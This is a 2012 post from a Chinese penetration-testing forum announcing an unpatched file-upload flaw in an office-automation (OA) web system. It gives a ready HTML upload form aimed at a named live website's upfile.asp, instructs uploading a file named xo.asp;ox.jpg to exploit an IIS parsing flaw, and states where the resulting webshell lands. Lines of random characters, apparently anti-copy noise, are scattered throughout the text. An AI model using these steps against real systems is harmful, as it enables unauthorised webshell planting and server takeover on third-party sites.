中国网络渗透测试联盟
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:45
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
6 i9 w) F. o' @
8 Y6 r& M$ ~6 Z! a s) D
系统介绍:
3 v* r! X/ C$ n l1 C+ x
: `# g, q& ?% r4 G5 e. V
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
4 k( S% J+ Q) \- F: \- f; w
& l2 P0 s5 o4 ]5 N {& c3 a
主要功能:
" e! I% ^5 V7 T+ r/ x* P6 _8 W) q
公司通告
0 h% X' A; d. ]
工作计划
( G2 V9 ^/ v/ O9 [6 w
通讯助理
' P8 T* z, I- H: I/ T6 E2 Q2 [
客户资源
3 v/ v+ b, r* m( m
我的公文
) q& h2 x, U% \% ]5 q5 [
公文传阅
" r$ S; |7 f5 J0 T) x
公共资源
( @8 K( L% g( E: N' P( V' {
资源预约
, y, M7 O# Y8 e0 L
今日考勤
( \. |! [/ @8 i& k, A
个人计划
+ m5 L i" y8 e
个人通讯录
, A" B% N% Z' L( H" l, h
个人基本档案
6 Z. H# b$ m- k
未读邮件
' S3 l& k. E2 B' b, N: n+ M
发邮件
& j9 e! _4 R% K" w2 K
收件夹
0 I1 k6 R* `3 R. E* m
寄件夹
7 H; l! Q9 U8 g% ]! D& x9 c
网络硬盘
% t; C; q, ^* A) m$ |6 r
网络会议
$ \' b3 Q" g: d
网络调查
4 M. s- }+ ?4 ?, ~. f4 p
交流论坛
; j& P5 f$ k! E: ^2 Z0 T( B
+ @8 [) Q9 M' D, a; d) I
有兴趣测试的朋友可以下源码看看
& r8 z t. s. n- t( r
6 Y! \. L+ h9 ^2 K' L8 h5 k
源码下载:
: n+ K+ k; I2 m9 H9 K' b& B+ j
4 F( ?! k2 U$ ?. R( E
http://www.mycodes.net/30/4750.htm
# u1 D* d7 ^" \2 ]& B9 e
/ s; a, h9 ^9 R O
漏洞介绍:
0 }( K4 x, J: G( }
# U7 v; I6 K& P
由upfile.asp上传文件漏洞引起
, T6 m5 l; C# O
* c9 r. Z) j- f: d6 E
测试方法:
+ h3 m9 q7 g. E0 }, i
, L# B' ]/ e4 J- q
使用名小子上传
http://www.itlynn.com/upfile.asp
即可
6 q+ U# M$ F5 C
$ r( Y0 W. O: R$ T) N9 _: i9 n
如果upfile.asp文件被删除不存在。
/ t; t8 ?& q* n0 D \) B9 s+ g, ~
; F/ _" M) u1 J: B" r# h, L1 P# }0 U
那么可以试着访问
http://www.itlynn.com/upfile/upfile.asp
。
+ j- e7 k7 P4 H3 G7 r- H) I
9 G: ^( E( m5 k; Q# x; y/ m" K5 u5 Q
如果存在那么将如下代码保存为upfile.html。
8 a/ Y$ O3 }: x8 W) [+ G
8 h1 f4 w* A. p* x. [5 ~$ D5 t
然后将action的参数修改为目标站点的url。例如
http://www.itlynn.com/upfile/upfile.asp
。
4 ~. A$ P% x* ^. e8 X8 w' ~
$ t; M' p! b3 K- p
5 R4 ?& A' U( j' m/ s4 j# @
* {+ R! l* H9 G8 t' [, m
01 <table border='0' align="center" cellpadding="5">
- }+ f) O: U! y- F7 k+ [6 x
$ {. K6 f" e x9 O/ P+ ~
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
% C) S; u" P# b" U
& p7 s T2 K, J* s
03 <tr>
0 D9 `3 O' K1 i" D' z
6 A9 O. C( \8 o
04 <td>报错:</td>
+ Y3 t* ^0 ~: H- d. j* i) `
: T1 d/ s1 m" _: e4 X, k: A/ |* P
05 <td><input type='radio' name='errnumber' value='0'>
: m/ j7 Z! w% y2 Q6 B+ v" r0 f
3 Z; X, @, o) o! T
06 自动更名
* x: `$ Z- {" Z3 q
9 d. _2 i. O9 N4 o' R
07 <input type='radio' name='errnumber' value='1' checked>
" h0 l+ U# N# ~4 h5 b7 I. f
. Y7 s3 r3 h+ R4 u$ T+ k. p
08 报错方式
# F t( _& w: p
+ C' a0 `; z; X* K
09 <input type='radio' name='errnumber' value='2'>
. r# V; \" R! Z. l9 L* ]
. x. z8 o! j6 p
10 直接覆盖</td>
( ?4 N' ?* O; \3 v6 O
2 _/ i8 O6 o+ f$ E* ~
11 </tr>
3 p% J2 m' q3 h* K
! K; i; N4 q- i2 S1 v( v7 E
12 <tr>
7 B" j/ Y3 W2 s. r+ S1 [
0 L: H. Z% s3 m6 S9 a: q
13 <td>主题:</td>
. p! I, |" l# O* P" r. i
: f3 B" x5 r! C3 s3 X
14 <td><input type='text' name='filename' size='30'></td>
2 `3 Z0 m( }4 z1 d: x
3 K1 q9 M1 H& r- m; J9 L6 s: R
15 </tr>
' {7 P) u; f8 I* ], D; F
# e1 I, e# s( T S8 D) w7 L* D
16 <tr>
6 T' u% E8 x0 ^( T
, A- u, r- M# c' u
17 <td>文件:</td>
3 [7 a9 ~* `+ {% w) f& W
4 I, n! D2 f/ ^2 h, ~, B
18 <td><input type="file"name="fruit"size="30"></td>
0 |; T0 e( o* x
4 m9 \! @' h- |0 ~9 |
19 </tr>
" X: `- s3 S$ M. F' b) B
5 Q3 H$ K# L9 U7 L! b- v( H
20 <tr>
, r. A4 y1 n% c) ?) @5 Q* {7 @% e
5 H7 ]. B0 `1 D" k" k7 g7 m) P
21 <td valign='top'>简介:</td>
2 |) a' e& |" q. V6 o$ k' L
) H3 l, A l( ^) O J/ H$ L0 r
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% [4 I' N1 B5 C7 k3 Z
9 e3 k1 T3 U) Z' W& f
23 </tr>
& P6 u" J+ X4 l1 c4 @' e
$ N4 w5 D" f1 q5 B u3 K/ A
24
! l2 @; K/ Z) r' \+ r9 J8 g
7 B4 p! q, k8 I, V* j# k# E9 |
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
7 f u! N( G6 F2 Z$ r
2 j1 l$ V d3 m+ i3 K* j
26 </tr>
$ A8 `5 b- H# o4 J7 @0 w4 u
5 x# i9 t' M) J( U
27 </form>
2 N1 c7 F9 N- ~, s
3 R, _0 B g/ U0 J
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
2 @9 N, K+ J! t) r% U
& j0 m! g. x3 q
* E4 _7 }, _& V
& f8 i: B- a7 I, [4 N9 u4 W
上传成功后,马的路径是:
http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
5 `9 s# [) F( g! B" M. ^* j' h
O7 Y8 Z0 W: v2 F4 [/ d: u
此漏洞需要配合解析漏洞利用。
6 K% `" |) k/ g. Y/ n+ l. S1 c/ j
0 Z4 a Y# H; t: h a. K# z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2